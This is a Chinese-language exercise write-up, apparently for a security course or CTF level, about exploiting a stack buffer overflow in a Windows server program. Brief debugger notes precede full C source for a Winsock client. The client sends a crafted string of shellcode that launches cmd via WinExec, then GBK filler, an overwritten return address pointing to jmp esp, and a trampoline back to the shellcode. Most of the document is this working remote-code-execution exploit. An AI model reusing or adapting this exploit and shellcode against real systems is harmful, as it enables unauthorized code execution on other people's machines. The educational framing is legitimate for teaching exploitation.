Win7 下测试成功,不过服务端程序会引发一个异常而崩溃,不会完美退出进程:

img

虚拟机下截图:

img

OllyDbg(OD)载入,断到溢出点 retn 0x4

img

retn 到 jmp esp

img

retn 到填充的 push eax 和 jmp [esp]

img

retn到shellcode头,也就是我们发送的攻击字串头,执行打开cmd的shellcode

img

成功溢出,开了一个新的cmd,在题目的目录下。

img

期待户振江同学的文章。贴上第三关的vc源码(shellcode在xp sp3的虚拟机下测试成功):

//cmd下需要服务器的ip地址参数 127.0.0.1
#include <stdio.h>
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"Ws2_32")
#define PORT 4000                            /* 客户机连接远程主机的端口 */ 
#define MAXDATASIZE 100                     /* 每次可以接收的最大字节 */ 
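/*
 * Send the whole buffer, looping on short sends. send() may transmit
 * fewer bytes than requested; a truncated attack string would leave the
 * return-address overwrite incomplete, so a partial send is a failure.
 *
 * s:   connected socket
 * buf: bytes to send
 * len: number of bytes in buf
 *
 * Returns 0 when all len bytes were sent, -1 on a socket error or a
 * zero-length send.
 */
static int send_all(SOCKET s, const BYTE *buf, int len)
{
    int done = 0;

    while (done < len) {
        int n = send(s, (const char *)buf + done, len - done, 0);
        if (n == SOCKET_ERROR || n == 0) {
            return -1;
        }
        done += n;
    }
    return 0;
}

/*
 * Level-3 exploit client. Connects to the vulnerable server at
 * argv[1]:PORT and sends one fixed attack string that overflows the
 * server's receive buffer (usage: client 127.0.0.1).
 *
 * Layout of szChat (sizes obtained by counting the tables below):
 *   bytes    0.. 194  195-byte shellcode; the strings "GetProcAddress",
 *                     "WinExec", "cmd" and "ExitProcess" are visible in
 *                     it, and the write-up says it opens a cmd window
 *   bytes  195.. 999  805 filler bytes (GBK text used as junk) that bring
 *                     the total to 1000, the offset at which the saved
 *                     return address is overwritten according to the
 *                     author's notes
 *   bytes 1000..1003  0x7FFA4512, the new return address; the author
 *                     reports a "jmp esp" at that address on the test VM
 *   bytes 1004..1007  4 bytes discarded by the callee's "retn 4"
 *   bytes 1008..1011  push eax / jmp [esp], which per the write-up lands
 *                     at the start of the buffer, i.e. the shellcode
 *
 * NOTE(review): 0x7FFA4512 is a fixed address tied to the OS build the
 * author tested on; it must be re-located for any other target, and on
 * systems where DEP/ASLR cover that page this payload will not work.
 *
 * Returns 0 once the whole payload has been sent, 1 on a usage, Winsock,
 * address, connect or send error.
 */
int main(int argc, char *argv[])
{
    BYTE szChat[] = {
    /* cmd shellcode */
       0xfc, 0x33, 0xd2, 0xb2, 0x30, 0x64, 0xff, 0x32, 0x5a, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
       0x72, 0x28, 0x33, 0xc9, 0xb1, 0x18, 0x33, 0xff, 0x33, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
       0x20, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xe2, 0xf0, 0x81, 0xff, 0x5b, 0xbc, 0x4a, 0x6a, 0x8b, 0x5a,
       0x10, 0x8b, 0x12, 0x75, 0xda, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0xff, 0x72, 0x34, 0x8b, 0x52, 0x78,
       0x03, 0xd3, 0x8b, 0x72, 0x20, 0x03, 0xf3, 0x33, 0xc9, 0x41, 0xad, 0x03, 0xc3, 0x81, 0x38, 0x47,
       0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x04, 0x72, 0x6f, 0x63, 0x41, 0x75, 0xeb, 0x81, 0x78,
       0x08, 0x64, 0x64, 0x72, 0x65, 0x75, 0xe2, 0x49, 0x8b, 0x72, 0x24, 0x03, 0xf3, 0x66, 0x8b, 0x0c,
       0x4e, 0x8b, 0x72, 0x1c, 0x03, 0xf3, 0x8b, 0x14, 0x8e, 0x03, 0xd3, 0x52, 0x68, 0x78, 0x65, 0x63,
       0x01, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x57, 0x69, 0x6e, 0x45, 0x54, 0x53, 0xff, 0xd2, 0x68, 0x63,
       0x6d, 0x64, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x6a, 0x05, 0x33, 0xc9, 0x8d, 0x4c, 0x24, 0x04, 0x51,
       0xff, 0xd0, 0x68, 0x65, 0x73, 0x73, 0x01, 0x8b, 0xdf, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x50, 0x72,
       0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0xff, 0x74, 0x24, 0x20, 0xff, 0x54, 0x24, 0x20,
       0x57, 0xff, 0xd0, 
       /* filler bytes (GBK text used as junk) */
        0xB8,0xDB,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xD7,0xCB,0xC8,0xDD,0xB7,0xE7,0xBB,0xAA,0xBE,0xF8,0xB4,0xFA,
        0xA3,0xAC,0xCE,0xD2,0xB5,0xC4,0xD0,0xA6,0xC3,0xB2,0xBF,0xF5,0xCA,0xC0,0xBE,0xF8,0xB3,0xBE,0xA1,0xA3,
        0xB7,0xBA,0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xB5,0xC4,0xC3,0xDB,0xD0,0xA6,0xA3,0xAC,0xC8,0xB4,0xD4,0xF5,
        0xC3,0xB4,0xD2,0xB2,0xB2,0xBB,0xD4,0xB8,0xD2,0xE2,0xD0,0xD1,0xC0,0xB4,0xA1,0xA3,0xB6,0xE0,0xC3,0xB4,
        0xD0,0xD2,0xB8,0xA3,0xB5,0xC4,0xCA,0xB1,0xBF,0xCC,0xA3,0xA1,0xCE,0xC7,0xA3,0xAC,0xCC,0xF0,0xC3,0xDB,
        0xB5,0xD8,0xC7,0xE3,0xD0,0xBA,0xCF,0xC2,0xC0,0xB4,0xA3,0xBA,0xB6,0xEE,0xC9,0xCF,0xA1,0xA2,0xD1,0xDB,
        0xC1,0xB1,0xA1,0xA2,0xB1,0xC7,0xBC,0xE2,0xA1,0xA2,0xC3,0xB5,0xB9,0xE5,0xB5,0xC4,0xB4,0xBD,0xA1,0xA3,
        0xC4,0xC7,0xBC,0xA4,0xB6,0xAF,0xB5,0xC4,0xA1,0xA2,0xB2,0xFC,0xB6,0xB6,0xB5,0xC4,0xA1,0xA2,0xBB,0xC5,
        0xC2,0xD2,0xB5,0xC4,0xA3,0xAC,0xB3,0xC9,0xB3,0xA4,0xD2,0xD4,0xC0,0xB4,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,
        0xD3,0xEB,0xC5,0xCE,0xCD,0xFB,0xA3,0xAC,0xCE,0xD2,0xCA,0xD6,0xD7,0xE3,0xCE,0xDE,0xB4,0xEB,0xA3,0xA1,
        0xBE,0xCD,0xD4,0xDA,0xBA,0xF4,0xCE,0xFC,0xD3,0xEB,0xB4,0xA5,0xBE,0xF5,0xC6,0xB5,0xC1,0xD9,0xBE,0xF8,
        0xBE,0xB3,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xD2,0xC0,0xCF,0xA1,0xB8,0xD0,0xBE,0xF5,0xC4,0xB0,
        0xC9,0xFA,0xA3,0xBA,0xCB,0xFB,0xB1,0xA6,0xCA,0xAF,0xB0,0xE3,0xB5,0xC4,0xED,0xF8,0xD7,0xD3,0xA3,0xAC,
        0xC6,0xCB,0xF3,0xF9,0xC3,0xD4,0xC0,0xEB,0xB5,0xC4,0xD1,0xDB,0xC9,0xF1,0xA3,0xAC,0xBD,0xC6,0xF7,0xEF,
        0xCE,0xA2,0xD1,0xEF,0xB5,0xC4,0xD7,0xEC,0xBD,0xC7,0xA3,0xAC,0xC7,0xE5,0xC7,0xB3,0xF7,0xC8,0xBB,0xF3,
        0xB5,0xC4,0xD0,0xA6,0xC8,0xDD,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xCD,0xF5,0xD7,0xD3,0xC4,0xD8,0xA3,0xBF,
        0xBB,0xCC,0xBB,0xF3,0xA1,0xA2,0xBE,0xAA,0xBA,0xF4,0xA1,0xA2,0xD5,0xF5,0xD4,0xFA,0xA1,0xAD,0xA1,0xAD,
        0xD2,0xBB,0xC7,0xD0,0xC0,0xB4,0xB5,0xC3,0xC4,0xC7,0xC3,0xB4,0xCD,0xBB,0xC8,0xBB,0xA3,0xA1,0xD4,0xDA,
        0xCE,0xDE,0xCA,0xFD,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,0xD6,0xD0,0xA3,0xAC,0xCE,0xD2,0xB6,0xBC,0xCA,0xC7,
        0xBE,0xF8,0xC3,0xC0,0xB5,0xC4,0xD7,0xCB,0xCC,0xAC,0xA3,0xAC,0xB3,0xF6,0xCF,0xD6,0xD4,0xDA,0xB0,0xAE,
        0xC7,0xE9,0xD6,0xAE,0xC7,0xB0,0xA1,0xA3,0xD5,0xE6,0xB5,0xC4,0xB2,0xBB,0xD6,0xAA,0xB5,0xC0,0xC3,0xFC,
        0xD4,0xCB,0xA3,0xAC,0xCE,0xAA,0xCA,0xB2,0xC3,0xB4,0xC8,0xE7,0xB4,0xCB,0xB2,0xBB,0xBF,0xB0,0xA1,0xA3,
        0xCB,0xD5,0xD0,0xD1,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xB0,0xB2,0xD4,0xDA,0xC4,0xB0,0xC9,0xFA,
        0xB5,0xC4,0xBE,0xB3,0xB5,0xD8,0xA3,0xAC,0xEB,0xFC,0xEB,0xCA,0xC6,0xAE,0xB7,0xF7,0xB5,0xC4,0xC1,0xB1,
        0xE1,0xA3,0xA3,0xAC,0xC3,0xD4,0xC0,0xEB,0xE4,0xD6,0xC8,0xBE,0xD7,0xC5,0xB4,0xBC,0xCF,0xE3,0xA1,0xA3,
        0xB7,0xC2,0xB7,0xF0,0xD3,0xD0,0xB8,0xF6,0xC9,0xF9,0xD2,0xF4,0xBA,0xF4,0xBB,0xBD,0xD7,0xC5,0xA3,0xAC,
        0xD4,0xD3,0xC2,0xD2,0xCB,0xF6,0xCB,0xE9,0xB5,0xC4,0xBD,0xC5,0xB2,0xBD,0xC9,0xF9,0xA3,0xAC,0xBB,0xCE,
        0xB6,0xAF,0xCE,0xDE,0xCA,0xFD,0xBB,0xB6,0xD4,0xC3,0xB5,0xC4,0xC1,0xB3,0xA1,0xAD,0xA1,0xAD,0xB8,0xD0,
        0xBE,0xF5,0xA3,0xAC,0xD2,0xC0,0xBE,0xC9,0xC8,0xE1,0xC8,0xED,0xCE,0xDE,0xC1,0xA6,0xA3,0xAC,0xC8,0xE7,
        0xCD,0xAC,0xB4,0xB9,0xCB,0xC0,0xD5,0xF5,0xD4,0xFA,0xA3,0xA1,0xC4,0xB3,0xD0,0xA9,0xD6,0xAD,0xD2,0xBA,
        0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xD3,0xCE,0xB6,0xAF,0xA3,0xAC,0xCB,0xE1,0xCB,0xE1,0xCC,0xF0,0xCC,0xF0,
        0xC9,0xAC,0xC9,0xAC,0xB5,0xC4,0xA3,0xAC,0xC9,0xF8,0xCD,0xB8,0xD7,0xC5,0xD7,0xED,0xC8,0xCB,0xB5,0xC4,
        0xB7,0xD2,0xB7,0xBC,0xA1,0xA3,0xD2,0xE2,0xCA,0xB6,0xBB,0xBA,0xBB,0xBA,0xC7,0xE5,0xD0,0xD1,0xB9,0xFD,
        0xC0,0xB4,0xC1,0xCB,0xA3,0xAC,0xB2,0xBB,0xD6,0xAA,0xCA,0xB2,0xC3,0xB4,0xCA,0xB1,0xBA,0xF2,0xB0,0xB2,
        0xBE,0xB2,0xC1,0xCB,0xA3,0xAC,0xC4,0xC7,0xD0,0xA9,0xA1,0xB0,0xC1,0xB3,0xC5,0xD3,0xA1,0xB1,0xB2,0xBB,
        0xBC,0xFB,0xC1,0xCB,0xA1,0xA3,0xBB,0xBB,0xB6,0xF8,0xB4,0xFA,0xD6,0xAE,0xA3,0xAC,0xCB,0xC6,0xD4,0xF8,
        0xCF,0xE0,0xCA,0xB6,0xA3,0xBA,0xCB,0xFB,0xC4,0xC7,0xC0,0xF5,0xBD,0xF0,0xC9,0xAB,0xB5,0xC4,0xB7,0xA2,
        0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
        0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
        0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,0xC4,0xB8,0xDF,0xD4,0xC6,   
        /* end of filler: shellcode + filler = 1000 bytes */

        /* Overwrites the saved return address. The callee returns with
         * "retn 4", so after the return esp points 4 bytes past the
         * next dword. The author reports a "jmp esp" at this address. */
        0x12,0x45,0xFA,0x7F,
        /* 4 bytes consumed by the "retn 4" */
        0x61,0x61,0x61,0x61,
        /* push eax ; jmp [esp]  -- jumps to eax, which per the write-up
         * is the start of the buffer (the shellcode) */
        0x50, 0xff, 0x24, 0x24,
    };
    SOCKET sockfd = INVALID_SOCKET;
    WSADATA ws;
    struct sockaddr_in their_addr;   /* server address and port */
    int rc = 1;                      /* exit status; 0 only on full success */

    if (argc != 2) {
        /* the server's IP address is required */
        fprintf(stderr, "usage: client hostname\n");
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0) {
        fprintf(stderr, "WSAStartup error\n");
        return 1;
    }

    /* clear sin_zero as well; the original left it uninitialized */
    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr.s_addr = inet_addr(argv[1]);
    if (their_addr.sin_addr.s_addr == INADDR_NONE) {
        /* inet_addr does not reject bad input with an errno; it returns INADDR_NONE */
        fprintf(stderr, "bad ip address: %s\n", argv[1]);
        goto out_wsa;
    }

    /* SOCKET is unsigned and pointer-sized on Win64; test against
     * INVALID_SOCKET instead of storing it in an int and comparing to -1 */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET) {
        fprintf(stderr, "socket error\n");
        goto out_wsa;
    }

    if (connect(sockfd, (struct sockaddr *)&their_addr, (int)sizeof their_addr) == SOCKET_ERROR) {
        fprintf(stderr, "connect error\n");
        goto out_close;
    }

    /* the overflow only works if every byte arrives, so loop on short sends */
    if (send_all(sockfd, szChat, (int)sizeof szChat) != 0) {
        fprintf(stderr, "send error\n");
        goto out_close;
    }
    rc = 0;

out_close:
    closesocket(sockfd);
out_wsa:
    WSACleanup();
    return rc;
}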